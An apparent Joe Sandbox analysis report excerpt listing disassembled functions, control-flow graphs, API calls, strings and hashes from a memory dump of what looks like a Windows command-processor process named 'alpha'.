                                                                                                            • Part of subcall function 00007FF7AB133578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335D9
                                                                                                            • Part of subcall function 00007FF7AB133578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335ED
                                                                                                            • Part of subcall function 00007FF7AB133578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB133602
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                          • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                          • API String ID: 1049357271-3021193919
                                                                                                          • Opcode ID: 09109df7b1f92dd6c706f13a256821a2299fbe80603d920afefa709af37ce98d
                                                                                                          • Instruction ID: 4a52ef6fa0e4acf9b8350bb3d9e3f83165947311791cc8e6d66f7248e5c593ea
                                                                                                          • Opcode Fuzzy Hash: 09109df7b1f92dd6c706f13a256821a2299fbe80603d920afefa709af37ce98d
                                                                                                          • Instruction Fuzzy Hash: 76C18431A0AA42C6EA4ABB1DF854179F7A0FF49B98FC65134D90E03375EF3DA4498320
                                                                                                          Function 00007FF7AB133C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 732 7ff7ab133c24-7ff7ab133c61 733 7ff7ab13ec5a-7ff7ab13ec5f 732->733 734 7ff7ab133c67-7ff7ab133c99 call 7ff7ab12af14 call 7ff7ab12ca40 732->734 733->734 736 7ff7ab13ec65-7ff7ab13ec6a 733->736 743 7ff7ab13ec97-7ff7ab13eca1 call 7ff7ab13855c 734->743 744 7ff7ab133c9f-7ff7ab133cb2 call 7ff7ab12b900 734->744 737 7ff7ab13412e-7ff7ab13415b call 7ff7ab138f80 736->737 744->743 749 7ff7ab133cb8-7ff7ab133cbc 744->749 750 7ff7ab133cbf-7ff7ab133cc7 749->750 750->750 751 7ff7ab133cc9-7ff7ab133ccd 750->751 752 7ff7ab133cd2-7ff7ab133cd8 751->752 753 7ff7ab133cda-7ff7ab133cdf 752->753 754 7ff7ab133ce5-7ff7ab133d62 GetCurrentDirectoryW towupper iswalpha 752->754 753->754 755 7ff7ab133faa-7ff7ab133fb3 753->755 756 7ff7ab133fb8 754->756 757 7ff7ab133d68-7ff7ab133d6c 754->757 755->752 759 7ff7ab133fc6-7ff7ab133fec GetLastError call 7ff7ab13855c call 7ff7ab13a5d6 756->759 757->756 758 7ff7ab133d72-7ff7ab133dcd towupper GetFullPathNameW 757->758 758->759 760 7ff7ab133dd3-7ff7ab133ddd 758->760 762 7ff7ab133ff1-7ff7ab134007 call 7ff7ab13855c _local_unwind 759->762 760->762 763 7ff7ab133de3-7ff7ab133dfb 760->763 774 7ff7ab13400c-7ff7ab134022 GetLastError 762->774 765 7ff7ab1340fe-7ff7ab134119 call 7ff7ab13855c _local_unwind 763->765 766 7ff7ab133e01-7ff7ab133e11 763->766 777 7ff7ab13411a-7ff7ab13412c call 7ff7ab12ff70 call 7ff7ab13855c 765->777 766->765 770 7ff7ab133e17-7ff7ab133e28 766->770 773 7ff7ab133e2c-7ff7ab133e34 770->773 773->773 778 7ff7ab133e36-7ff7ab133e3f 773->778 775 7ff7ab134028-7ff7ab13402b 774->775 776 7ff7ab133e95-7ff7ab133e9c 774->776 775->776 780 7ff7ab134031-7ff7ab134047 call 7ff7ab13855c _local_unwind 775->780 781 7ff7ab133e9e-7ff7ab133ec2 call 7ff7ab132978 776->781 782 7ff7ab133ecf-7ff7ab133ed3 776->782 777->737 779 7ff7ab133e42-7ff7ab133e55 778->779 784 7ff7ab133e57-7ff7ab133e60 779->784 785 7ff7ab133e66-7ff7ab133e8f GetFileAttributesW 779->785 799 7ff7ab13404c-7ff7ab134062 call 7ff7ab13855c _local_unwind 780->799 793 7ff7ab133ec7-7ff7ab133ec9 781->793 788 7ff7ab133f08-7ff7ab133f0b 782->788 789 7ff7ab133ed5-7ff7ab133ef7 GetFileAttributesW 782->789 784->785 791 7ff7ab133f9d-7ff7ab133fa5 784->791 785->774 785->776 797 7ff7ab133f0d-7ff7ab133f11 788->797 798 7ff7ab133f1e-7ff7ab133f40 SetCurrentDirectoryW 788->798 794 7ff7ab134067-7ff7ab134098 GetLastError call 7ff7ab13855c _local_unwind 789->794 795 7ff7ab133efd-7ff7ab133f02 789->795 791->779 793->782 793->799 801 7ff7ab13409d-7ff7ab1340b3 call 7ff7ab13855c _local_unwind 794->801 795->788 795->801 803 7ff7ab133f46-7ff7ab133f69 call 7ff7ab13498c 797->803 804 7ff7ab133f13-7ff7ab133f1c 797->804 798->803 805 7ff7ab1340b8-7ff7ab1340de GetLastError call 7ff7ab13855c _local_unwind 798->805 799->794 801->805 815 7ff7ab1340e3-7ff7ab1340f9 call 7ff7ab13855c _local_unwind 803->815 816 7ff7ab133f6f-7ff7ab133f98 call 7ff7ab13417c 803->816 804->798 804->803 805->815 815->765 816->777
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                          • String ID: :
                                                                                                          • API String ID: 1809961153-336475711
                                                                                                          • Opcode ID: 9a6838553337d10caea9482eb8d4b87fb6c3f53a5735761c353ac2a4c5941523
                                                                                                          • Instruction ID: 9ace4cb69f23fcbb15aaca33579ab120419c80435ad67f83b6172f3893cc77ed
                                                                                                          • Opcode Fuzzy Hash: 9a6838553337d10caea9482eb8d4b87fb6c3f53a5735761c353ac2a4c5941523
                                                                                                          • Instruction Fuzzy Hash: F4D1822270AB85C1EAA6EB19F4442B9F7A0FB85744F865135D94E437B4EF3CE449CB20
                                                                                                          Function 00007FF7AB132394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 914 7ff7ab132394-7ff7ab132416 memset call 7ff7ab12ca40 917 7ff7ab13241c-7ff7ab132453 GetModuleFileNameW call 7ff7ab13081c 914->917 918 7ff7ab13e0d2-7ff7ab13e0da call 7ff7ab134c1c 914->918 923 7ff7ab13e0db-7ff7ab13e0ee call 7ff7ab13498c 917->923 924 7ff7ab132459-7ff7ab132468 call 7ff7ab13081c 917->924 918->923 930 7ff7ab13e0f4-7ff7ab13e107 call 7ff7ab13498c 923->930 929 7ff7ab13246e-7ff7ab13247d call 7ff7ab13081c 924->929 924->930 935 7ff7ab132516-7ff7ab132529 call 7ff7ab13498c 929->935 936 7ff7ab132483-7ff7ab132492 call 7ff7ab13081c 929->936 937 7ff7ab13e10d-7ff7ab13e123 930->937 935->936 936->937 947 7ff7ab132498-7ff7ab1324a7 call 7ff7ab13081c 936->947 940 7ff7ab13e13f-7ff7ab13e17a _wcsupr 937->940 941 7ff7ab13e125-7ff7ab13e139 wcschr 937->941 945 7ff7ab13e17c-7ff7ab13e17f 940->945 946 7ff7ab13e181-7ff7ab13e199 wcsrchr 940->946 941->940 944 7ff7ab13e27c 941->944 949 7ff7ab13e283-7ff7ab13e29b call 7ff7ab13498c 944->949 948 7ff7ab13e19c 945->948 946->948 956 7ff7ab1324ad-7ff7ab1324c5 call 7ff7ab133c24 947->956 957 7ff7ab13e2a1-7ff7ab13e2c3 _wcsicmp 947->957 951 7ff7ab13e1a0-7ff7ab13e1a7 948->951 949->957 951->951 954 7ff7ab13e1a9-7ff7ab13e1bb 951->954 958 7ff7ab13e1c1-7ff7ab13e1e6 954->958 959 7ff7ab13e264-7ff7ab13e277 call 7ff7ab131300 954->959 964 7ff7ab1324ca-7ff7ab1324db 956->964 962 7ff7ab13e21a 958->962 963 7ff7ab13e1e8-7ff7ab13e1f1 958->963 959->944 969 7ff7ab13e21d-7ff7ab13e21f 962->969 965 7ff7ab13e201-7ff7ab13e210 963->965 966 7ff7ab13e1f3-7ff7ab13e1f6 963->966 967 7ff7ab1324e9-7ff7ab132514 call 7ff7ab138f80 964->967 968 7ff7ab1324dd-7ff7ab1324e4 ??_V@YAXPEAX@Z 964->968 965->962 973 7ff7ab13e212-7ff7ab13e218 965->973 966->965 972 7ff7ab13e1f8-7ff7ab13e1ff 966->972 968->967 969->949 971 7ff7ab13e221-7ff7ab13e228 969->971 975 7ff7ab13e22a-7ff7ab13e231 971->975 976 7ff7ab13e254-7ff7ab13e262 971->976 972->965 972->966 973->969 977 7ff7ab13e234-7ff7ab13e237 975->977 976->944 977->976 978 7ff7ab13e239-7ff7ab13e242 977->978 978->976 979 7ff7ab13e244-7ff7ab13e252 978->979 979->976 979->977
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                          • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                          • API String ID: 2622545777-4197029667
                                                                                                          • Opcode ID: 9e052dd8a569df61deb78e5422594237265ab7758b060a59aba3d98d3c4be830
                                                                                                          • Instruction ID: 65450c51038dbd328c0ca5448bcab452235d59872ec484ed5fc78df8e183612b
                                                                                                          • Opcode Fuzzy Hash: 9e052dd8a569df61deb78e5422594237265ab7758b060a59aba3d98d3c4be830
                                                                                                          • Instruction Fuzzy Hash: A4919922B0A74285EE6AAB1CF8945F8A790FF48B48FC64135C54E476B5EF3CE509C760
                                                                                                          Function 00007FF7AB130580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                          • String ID: CMD.EXE
                                                                                                          • API String ID: 1606018815-3025314500
                                                                                                          • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                          • Instruction ID: fd468a8ac3c0bd59290ead3d8ac601759793f8a8d5efaa6724b2c7ccc334a540
                                                                                                          • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                          • Instruction Fuzzy Hash: A841C131A0B602CBE70A6B1CF895278FBA0BB8A759FC69235C50E43374DF3CA4549621
                                                                                                          Function 00007FF7AB12C620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 992 7ff7ab12c620-7ff7ab12c66f GetConsoleTitleW 993 7ff7ab13c5f2 992->993 994 7ff7ab12c675-7ff7ab12c687 call 7ff7ab12af14 992->994 996 7ff7ab13c5fc-7ff7ab13c60c GetLastError 993->996 999 7ff7ab12c689 994->999 1000 7ff7ab12c68e-7ff7ab12c69d call 7ff7ab12ca40 994->1000 998 7ff7ab13c5e3 call 7ff7ab123278 996->998 1004 7ff7ab13c5e8-7ff7ab13c5ed call 7ff7ab13855c 998->1004 999->1000 1000->1004 1005 7ff7ab12c6a3-7ff7ab12c6ac 1000->1005 1004->993 1007 7ff7ab12c6b2-7ff7ab12c6c5 call 7ff7ab12b9c0 1005->1007 1008 7ff7ab12c954-7ff7ab12c95e call 7ff7ab13291c 1005->1008 1015 7ff7ab12c6cb-7ff7ab12c6ce 1007->1015 1016 7ff7ab12c9b5-7ff7ab12c9b8 call 7ff7ab135c6c 1007->1016 1013 7ff7ab13c5de-7ff7ab13c5e0 1008->1013 1014 7ff7ab12c964-7ff7ab12c96b call 7ff7ab1289c0 1008->1014 1013->998 1020 7ff7ab12c970-7ff7ab12c972 1014->1020 1015->1004 1018 7ff7ab12c6d4-7ff7ab12c6e9 1015->1018 1023 7ff7ab12c9bd-7ff7ab12c9c9 call 7ff7ab13855c 1016->1023 1021 7ff7ab12c6ef-7ff7ab12c6fa 1018->1021 1022 7ff7ab13c616-7ff7ab13c620 call 7ff7ab13855c 1018->1022 1020->996 1024 7ff7ab12c978-7ff7ab12c99a towupper 1020->1024 1025 7ff7ab13c627 1021->1025 1026 7ff7ab12c700-7ff7ab12c713 1021->1026 1022->1025 1039 7ff7ab12c9d0-7ff7ab12c9d7 1023->1039 1029 7ff7ab12c9a0-7ff7ab12c9a9 1024->1029 1031 7ff7ab13c631 1025->1031 1030 7ff7ab12c719-7ff7ab12c72c 1026->1030 1026->1031 1029->1029 1034 7ff7ab12c9ab-7ff7ab12c9af 1029->1034 1035 7ff7ab13c63b 1030->1035 1036 7ff7ab12c732-7ff7ab12c747 call 7ff7ab12d3f0 1030->1036 1031->1035 1034->1016 1037 7ff7ab13c60e-7ff7ab13c611 call 7ff7ab14ec14 1034->1037 1042 7ff7ab13c645 1035->1042 1046 7ff7ab12c74d-7ff7ab12c750 1036->1046 1047 7ff7ab12c8ac-7ff7ab12c8af 1036->1047 1037->1022 1040 7ff7ab12c9dd-7ff7ab13c6da SetConsoleTitleW 1039->1040 1041 7ff7ab12c872-7ff7ab12c8aa call 7ff7ab13855c call 7ff7ab138f80 1039->1041 1040->1041 1051 7ff7ab13c64e-7ff7ab13c651 1042->1051 1052 7ff7ab12c76a-7ff7ab12c76d 1046->1052 1053 7ff7ab12c752-7ff7ab12c764 call 7ff7ab12bd38 1046->1053 1047->1046 1050 7ff7ab12c8b5-7ff7ab12c8d3 wcsncmp 1047->1050 1050->1052 1058 7ff7ab12c8d9 1050->1058 1059 7ff7ab13c657-7ff7ab13c65b 1051->1059 1060 7ff7ab12c80d-7ff7ab12c811 1051->1060 1056 7ff7ab12c840-7ff7ab12c84b call 7ff7ab12cb40 1052->1056 1057 7ff7ab12c773-7ff7ab12c77a 1052->1057 1053->1004 1053->1052 1077 7ff7ab12c84d-7ff7ab12c855 call 7ff7ab12cad4 1056->1077 1078 7ff7ab12c856-7ff7ab12c86c 1056->1078 1065 7ff7ab12c780-7ff7ab12c784 1057->1065 1058->1046 1059->1060 1061 7ff7ab12c817-7ff7ab12c81b 1060->1061 1062 7ff7ab12c9e2-7ff7ab12c9e7 1060->1062 1067 7ff7ab12ca1b-7ff7ab12ca1f 1061->1067 1068 7ff7ab12c821 1061->1068 1062->1061 1069 7ff7ab12c9ed-7ff7ab12c9f7 call 7ff7ab13291c 1062->1069 1070 7ff7ab12c78a-7ff7ab12c7a4 wcschr 1065->1070 1071 7ff7ab12c83d 1065->1071 1067->1068 1079 7ff7ab12ca25-7ff7ab13c6b3 call 7ff7ab123278 1067->1079 1073 7ff7ab12c824-7ff7ab12c82d 1068->1073 1086 7ff7ab12c9fd-7ff7ab12ca00 1069->1086 1087 7ff7ab13c684-7ff7ab13c698 call 7ff7ab123278 1069->1087 1075 7ff7ab12c7aa-7ff7ab12c7ad 1070->1075 1076 7ff7ab12c8de-7ff7ab12c8f7 1070->1076 1071->1056 1073->1073 1080 7ff7ab12c82f-7ff7ab12c837 1073->1080 1082 7ff7ab12c7b0-7ff7ab12c7b8 1075->1082 1083 7ff7ab12c900-7ff7ab12c908 1076->1083 1077->1078 1078->1039 1078->1041 1079->1004 1080->1065 1080->1071 1082->1082 1088 7ff7ab12c7ba-7ff7ab12c7c7 1082->1088 1083->1083 1089 7ff7ab12c90a-7ff7ab12c915 1083->1089 1086->1061 1093 7ff7ab12ca06-7ff7ab12ca10 call 7ff7ab1289c0 1086->1093 1087->1004 1088->1051 1094 7ff7ab12c7cd-7ff7ab12c7db 1088->1094 1095 7ff7ab12c93a-7ff7ab12c944 1089->1095 1096 7ff7ab12c917 1089->1096 1093->1061 1111 7ff7ab12ca16-7ff7ab13c67f GetLastError call 7ff7ab123278 1093->1111 1100 7ff7ab12c7e0-7ff7ab12c7e7 1094->1100 1103 7ff7ab12ca2a-7ff7ab12ca2f call 7ff7ab139158 1095->1103 1104 7ff7ab12c94a 1095->1104 1101 7ff7ab12c920-7ff7ab12c928 1096->1101 1106 7ff7ab12c7e9-7ff7ab12c7f1 1100->1106 1107 7ff7ab12c800-7ff7ab12c803 1100->1107 1108 7ff7ab12c92a-7ff7ab12c92f 1101->1108 1109 7ff7ab12c932-7ff7ab12c938 1101->1109 1103->1013 1104->1008 1106->1107 1112 7ff7ab12c7f3-7ff7ab12c7fe 1106->1112 1107->1042 1113 7ff7ab12c809 1107->1113 1108->1109 1109->1095 1109->1101 1111->1004 1112->1100 1112->1107 1113->1060
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleTitlewcschr
                                                                                                          • String ID: /$:
                                                                                                          • API String ID: 2364928044-4222935259
                                                                                                          • Opcode ID: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                                                                          • Instruction ID: 227b7eee1c5dd443d77245762dc61421dbb2f4786d64ac6fd2311f0bdfe25396
                                                                                                          • Opcode Fuzzy Hash: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                                                                          • Instruction Fuzzy Hash: 67C1D461E0A642C1EA56BB1DF4142B9E2A1FF41B58FD68131CA1E472F5EF3CE446D320
                                                                                                          Function 00007FF7AB138D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1171 7ff7ab138d80-7ff7ab138da2 1172 7ff7ab138da4-7ff7ab138daf 1171->1172 1173 7ff7ab138dcc 1172->1173 1174 7ff7ab138db1-7ff7ab138db4 1172->1174 1177 7ff7ab138dd1-7ff7ab138dd9 1173->1177 1175 7ff7ab138dbf-7ff7ab138dca Sleep 1174->1175 1176 7ff7ab138db6-7ff7ab138dbd 1174->1176 1175->1172 1176->1177 1178 7ff7ab138de7-7ff7ab138def 1177->1178 1179 7ff7ab138ddb-7ff7ab138de5 _amsg_exit 1177->1179 1181 7ff7ab138df1-7ff7ab138e0a 1178->1181 1182 7ff7ab138e46 1178->1182 1180 7ff7ab138e4c-7ff7ab138e54 1179->1180 1184 7ff7ab138e56-7ff7ab138e69 _initterm 1180->1184 1185 7ff7ab138e73-7ff7ab138e75 1180->1185 1183 7ff7ab138e0e-7ff7ab138e11 1181->1183 1182->1180 1186 7ff7ab138e38-7ff7ab138e3a 1183->1186 1187 7ff7ab138e13-7ff7ab138e15 1183->1187 1184->1185 1188 7ff7ab138e77-7ff7ab138e79 1185->1188 1189 7ff7ab138e80-7ff7ab138e88 1185->1189 1186->1180 1191 7ff7ab138e3c-7ff7ab138e41 1186->1191 1190 7ff7ab138e17-7ff7ab138e1b 1187->1190 1187->1191 1188->1189 1192 7ff7ab138e8a-7ff7ab138e98 call 7ff7ab1394f0 1189->1192 1193 7ff7ab138eb4-7ff7ab138ec8 call 7ff7ab1337d8 1189->1193 1195 7ff7ab138e2d-7ff7ab138e36 1190->1195 1196 7ff7ab138e1d-7ff7ab138e29 1190->1196 1198 7ff7ab138f28-7ff7ab138f3d 1191->1198 1192->1193 1201 7ff7ab138e9a-7ff7ab138eaa 1192->1201 1200 7ff7ab138ecd-7ff7ab138eda 1193->1200 1195->1183 1196->1195 1203 7ff7ab138edc-7ff7ab138ede exit 1200->1203 1204 7ff7ab138ee4-7ff7ab138eeb 1200->1204 1201->1193 1203->1204 1205 7ff7ab138ef9 1204->1205 1206 7ff7ab138eed-7ff7ab138ef3 _cexit 1204->1206 1205->1198 1206->1205
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 4291973834-0
                                                                                                          • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                          • Instruction ID: 555eb4d8b87a6275351531491a8030b73a457dcaf32e91daaf72d3d56b4d1a99
                                                                                                          • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                          • Instruction Fuzzy Hash: 10410A25A0A60382F797BB1CF980675A6A0FF5434CFD60935D91D876B0EF7CE8988760
                                                                                                          Function 00007FF7AB1289C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1207 7ff7ab1289c0-7ff7ab128a3d memset call 7ff7ab12ca40 1210 7ff7ab128ace-7ff7ab128adf 1207->1210 1211 7ff7ab128a43-7ff7ab128a71 GetDriveTypeW 1207->1211 1212 7ff7ab128aed 1210->1212 1213 7ff7ab128ae1-7ff7ab128ae8 ??_V@YAXPEAX@Z 1210->1213 1214 7ff7ab128a77-7ff7ab128a7a 1211->1214 1215 7ff7ab13b411-7ff7ab13b422 1211->1215 1216 7ff7ab128aef-7ff7ab128b16 call 7ff7ab138f80 1212->1216 1213->1212 1214->1210 1219 7ff7ab128a7c-7ff7ab128a7f 1214->1219 1217 7ff7ab13b430-7ff7ab13b435 1215->1217 1218 7ff7ab13b424-7ff7ab13b42b ??_V@YAXPEAX@Z 1215->1218 1217->1216 1218->1217 1219->1210 1221 7ff7ab128a81-7ff7ab128ac8 GetVolumeInformationW 1219->1221 1221->1210 1222 7ff7ab13b3fc-7ff7ab13b40b GetLastError 1221->1222 1222->1210 1222->1215
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
